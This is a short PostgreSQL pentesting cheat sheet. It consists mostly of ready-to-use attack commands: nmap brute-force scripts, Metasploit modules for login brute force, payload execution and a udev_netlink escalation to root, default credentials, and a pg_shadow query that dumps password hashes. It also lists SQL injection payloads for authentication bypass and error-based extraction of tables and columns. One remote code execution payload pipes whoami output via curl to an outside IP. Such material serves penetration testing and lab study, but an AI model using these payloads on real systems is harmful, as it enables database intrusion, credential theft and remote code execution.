5432 - Pentesting psql

PostgreSQL is an open-source relational database management system (RDBMS) that is widely used for managing and storing data. It is known for its reliability, stability, and robust feature set, and it is used by organizations of all sizes, from small startups to large enterprise businesses.

nmap

sudo nmap -sV -sC -p 5432 $IP

nmap -p 5432 --script=pgsql-brute $IP

metasploit

metasploit - version

use auxiliary/scanner/postgres/postgres_version
use auxiliary/scanner/postgres/postgres_login

metasploit - postgres - 8.3.1 + udev_netlink

use exploit/linux/postgres/postgres_payload
|-> getuid => postgres 
use exploit/linux/local/udev_netlink
|-> getuid => root

Users

user	pass
postgres	postgres
postgres	password

Connect (local)

psql -U postgres

Connect (remote)

psql -h $IP -U postgres -W postgres
psql -h $IP -U postgres -d <database>
psql -h <host> -p <port> -U postgres -W postgres <database>

\list # List databases
\c <database> # use the database
\d # List tables
\du+ # Get users roles

# Get current user
Select user;

# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
\dn+

#List databases
SELECT datname FROM pg_database;

#Read credentials (usernames + pwd hash)
SELECT usename, passwd from pg_shadow;

# Get languages
SELECT lanname,lanacl FROM pg_language;

# Show installed extensions
SHOW rds.extensions;

# Get history of commands executed
\s

SQL Injection

basic

x' or 1=1 -- x
x' or (1=1 and username='admin') -- x
x' or (1=1 and (SELECT count(*) FROM users) = 1) -- x
x'; SELECT CAST(password AS DATE) FROM users; -- x

list of tables

x'; SELECT cast(cast(json_agg(table_name) as varchar) as boolean) FROM information_schema.tables; -- x

list of columns

x'; SELECT cast(cast(json_agg(column_name) as varchar) as boolean) FROM information_schema.columns where table_name = 'users'; -- x

RCE

x'; copy (SELECT '') to program 'curl http://10.10.14.13?f=`whoami|base64`'-- x